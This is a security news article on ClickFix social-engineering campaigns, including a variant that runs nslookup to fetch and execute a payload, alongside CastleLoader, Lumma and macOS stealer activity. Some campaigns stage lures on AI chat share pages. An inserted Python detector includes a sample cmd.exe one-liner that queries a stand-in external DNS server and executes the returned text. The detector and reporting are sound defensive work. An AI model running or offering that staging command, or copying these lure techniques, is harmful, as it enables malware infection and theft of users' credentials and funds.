Microsoft has revealed details of a new variant of the ClickFix social engineering tactic in which attackers trick unsuspecting users into running commands that perform domain name system (DNS) lookups to retrieve the next stage’s payload.
Specifically, the attack relies on using the “nslookup” (short for nameserver lookup) command to perform a custom DNS lookup triggered through the Windows Run dialog.
ClickFix is an increasingly popular technique traditionally distributed via phishing, malware, or drive-by download schemes, often redirecting targets to fake landing pages that host fake CAPTCHA verifications or instructions to fix a non-existent problem on their computer by running a command through the Windows Run dialog or the macOS Terminal app.
The attack method has become widespread over the past two years because it relies on victims infecting their own machines, which lets threat actors bypass security controls. The effectiveness of ClickFix has been such that it has spawned several variants, such as FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.
“In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server instead of the system’s default resolver,” the Microsoft Threat Intelligence team said in a series of posts on X. “The output is filtered to extract the ‘name:’ DNS response, which is executed as the payload of the second stage.”
Microsoft said this new version of ClickFix uses DNS as a “lightweight staging or signaling channel”, enabling the threat actor to access infrastructure under their control, as well as erecting a new verification layer before executing the second-stage payload.
“Using DNS in this way reduces reliance on traditional web requests and can help malicious activity blend into normal network traffic,” the Windows maker said.
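To turn the staging traits Microsoft describes (a cmd.exe one-liner, nslookup against a hard-coded non-default resolver, output filtered for the “Name:” line and then executed) into a process-creation detection, here is an added example that is not from Microsoft’s report; the trusted-resolver set and the sample command lines are constructed assumptions.

```python
import re

# Assumption for this example: resolvers the organisation's endpoints should use.
TRUSTED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}

# Constructed sample command lines (not indicators from the Microsoft report).
SAMPLES = {
    "benign_lookup": "nslookup www.example.com",
    "admin_lookup": "nslookup -type=mx example.com 10.0.0.53",
    "staging_chain": ('cmd.exe /c for /f "tokens=*" %i in (\'nslookup -type=txt '
                      'update.invalid 203.0.113.5 ^| findstr /i name\') do %i'),
}


def nslookup_server(cmdline: str):
    """Return the explicit resolver passed to the first nslookup call, if any.
    Syntax is `nslookup [-opts] <name> [<server>]`, so a second positional
    argument means the system's default resolver was bypassed."""
    tokens = [t for t in (tok.strip("('\")") for tok in cmdline.split()) if t]
    lowered = [t.lower() for t in tokens]
    if "nslookup" not in lowered:
        return None
    positional = []
    for tok in tokens[lowered.index("nslookup") + 1:]:
        if tok.startswith(("|", "^|", "&")):
            break                      # end of the nslookup command
        if not tok.startswith("-"):    # skip options such as -type=txt
            positional.append(tok)
    return positional[1] if len(positional) >= 2 else None


def analyse_cmdline(cmdline: str) -> dict:
    """Score one process command line against the DNS-staging traits."""
    low = cmdline.lower()
    server = nslookup_server(cmdline)
    findings = {
        "nslookup": "nslookup" in low,
        # hard-coded resolver that is not one of ours
        "external_resolver": server is not None and server not in TRUSTED_RESOLVERS,
        # output filtered for the 'Name:' answer line
        "filters_name_field": bool(re.search(r"\bfind(str)?\b.*\bname\b", low)),
        # cmd.exe 'for /f ... do' feeds the filtered text back in as a command
        "executes_output": bool(re.search(r"\bfor\s+/f\b.*\bdo\b", low)),
    }
    findings["score"] = sum(1 for v in findings.values() if v is True)
    findings["server"] = server
    return findings


def is_dns_staging(cmdline: str, threshold: int = 3) -> bool:
    """True when enough of the chain's traits co-occur in one command line."""
    return analyse_cmdline(cmdline)["score"] >= threshold
```

In practice the command line would come from a process-creation event (for example Sysmon Event ID 1) whose parent is explorer.exe when launched from the Run dialog; pairing that parent with a score of 3 or more keeps ordinary nslookup troubleshooting out of the alert queue.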
The downloaded payload subsequently initiates an attack chain that leads to downloading a ZIP archive from an external server (“azwsappdev[.]com”), from which a malicious Python script is extracted and run to drop a Visual Basic Script (VBScript) responsible for performing reconnaissance, running discovery commands, and launching ModeloRAT, a Python-based remote access trojan previously distributed through CrashFix.
To establish persistence, a Windows Shortcut (LNK) file pointing to the VBScript is created in the Windows Startup folder so that the malware is automatically launched every time the operating system starts.
The disclosure comes as Bitdefender warned of an increase in Lumma Stealer activity, driven by ClickFix-style fake CAPTCHA campaigns that deploy an AutoIt version of CastleLoader, a malware loader associated with the threat actor codenamed GrabRavo (formerly TAG-150).
CastleLoader incorporates checks to determine the presence of virtualization software and specific security programs before decrypting and launching memory-stealing malware. Outside of ClickFix, websites advertising cracked software and pirated movies serve as bait for CastleLoader-based attack chains, which trick users into downloading fake installers or executables masquerading as MP4 media files.
Other CastleLoader campaigns have also used websites promising cracked software downloads as a starting point to distribute a fake NSIS installer, which runs obscure VBA scripts before running the AutoIt script that loads Lumma Stealer. The VBA loader is designed to run scheduled tasks responsible for ensuring persistence.
“Despite significant law enforcement disruption efforts in 2025, Lumma Stealer continued to operate, demonstrating resiliency by rapidly migrating to new hosting providers and adopting alternative loaders and delivery technologies,” the Romanian cybersecurity company said. “At the core of many of these campaigns is CastleLoader, which plays a central role in helping Lumma Stealer spread through delivery chains.”
Interestingly, one of the domains on CastleLoader’s infrastructure (“testdomain123123[.]shop”) was marked as Lumma Stealer command-and-control (C2), indicating that the operators of the two malware families are either working together or sharing service providers. The majority of Lumma Stealer infection cases have been reported in India, followed by France, the US, Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.
“ClickFix’s effectiveness lies in the abuse of procedural trust rather than technical vulnerabilities,” Bitdefender said. “The instructions resemble troubleshooting steps or verification solutions that users may have encountered before. As a result, victims often fail to recognize that they are manually executing arbitrary code on their system.”
CastleLoader is not the only loader being used to distribute Lumma Stealer. Campaigns observed as early as March 2025 have taken advantage of another loader called RainEngine Loader to propagate malware under the guise of game cheats and pirated software such as the CorelDRAW graphics editor. In these attacks, the loader makes way for a secondary loader called HijackLoader, which then deploys Lumma Stealer.
According to Kaspersky data, RainEngine Loader attacks since March 2025 have primarily affected users in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France.
This development coincides with the emergence of various campaigns using social engineering lures, including ClickFix, to distribute various types of stealers and malware loaders –
- A macOS campaign that has used phishing and malware tricks to distribute Odyssey Stealer, a rebrand of Poseidon Stealer, itself a fork of Atomic macOS Stealer (AMOS). The stealer exfiltrates credentials and data from 203 browser wallet extensions and 18 desktop wallet applications to facilitate cryptocurrency theft.
- “Beyond credential theft, Odyssey operates as a full remote access trojan,” Sensis said. “A persistent LaunchDaemon polls C2 every 60 seconds for commands, supporting arbitrary shell execution, re-infection, and SOCKS5 proxies to tunnel traffic through victim machines.”
- A series of ClickFix attacks targeting Windows systems that use fake CAPTCHA verification pages on legitimate-but-compromised websites to trick users into executing PowerShell commands, ultimately deploying the Stealsee information stealer.
- An email phishing campaign that uses a malicious SVG file contained within a password-protected ZIP archive to instruct the victim to run a PowerShell command using ClickFix, ultimately resulting in the deployment of an open-source .NET infostealer called Stellarium.
- A campaign that uses the public sharing feature of generative artificial intelligence (AI) services like Anthropic Claude to stage malicious ClickFix instructions on how to perform various tasks on macOS (for example, “Online DNS Resolver”), and distributes these links through sponsored results on search engines like Google to deploy Atomic Stealer and MacSync Stealer.
- A campaign that directs users searching for “macOS cli disk space analyzer” to a fake Medium article impersonating Apple’s support team, in order to trick them into running the ClickFix instruction, which delivers the next stage’s stealer payload from an external server called “raxelpak[.]com”.
- “C2 domain raxelpak[.]com’s URL history dates back to 2021, when it appeared to host a safety workwear e-commerce site,” MacPaw’s Moonlock Lab said. “Whether the domain was hijacked or simply expired and re-registered [by the threat actor] is unclear, but it fits into a broader pattern of leveraging old domains with existing reputations to avoid detection.”
- A variation of the same campaign that stages ClickFix instructions for installing Homebrew on Claude and Evernote links promoted through sponsored results to install stealer malware.
- “The ad shows a genuine, recognized domain (claude.ai), not a spoof or typo-squatted site,” Edgard said. “Clicking on the ad leads to a real Claude page, not a phishing copy. The result is clear: Google ads + a well-known trusted platform + technical users with high downstream influence = a powerful malware distribution vector.”
- A macOS email phishing campaign that induces recipients to download and run an AppleScript file intended to address alleged compatibility issues, resulting in the deployment of another AppleScript designed to steal credentials and retrieve additional JavaScript payloads.
- “The malware does not grant itself permissions; instead, it creates TCC authorizations for trusted Apple-signed binaries (Terminal, osascript, Script Editor, and Bash) and then executes malicious actions via these binaries to gain their permissions,” Darktrace said.
- A ClearFake campaign that plants fake CAPTCHA lures on compromised WordPress sites to trigger HTML Application (HTA) file execution and deploy Lumma Stealer. The campaign is also known to have used malicious JavaScript injection to call a smart contract hosted on the BNB Smart Chain and leverage a technique called EtherHiding to fetch a payload hosted on GitHub.
- EtherHiding provides several benefits to attackers, allowing malicious traffic to be mixed with legitimate Web3 activity. Because blockchain is immutable and decentralized, it provides increased resiliency in the face of takedown attempts.
A recent analysis published by Flare found that threat actors are increasingly targeting Apple macOS with infostealers and sophisticated tools.
“Almost every macOS stealer prioritizes stealing cryptocurrency above everything else,” the company said. “This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once the seed phrases are compromised, the funds disappear permanently with no recourse.”
“The notion that ‘Macs don’t have viruses’ is not only outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage.”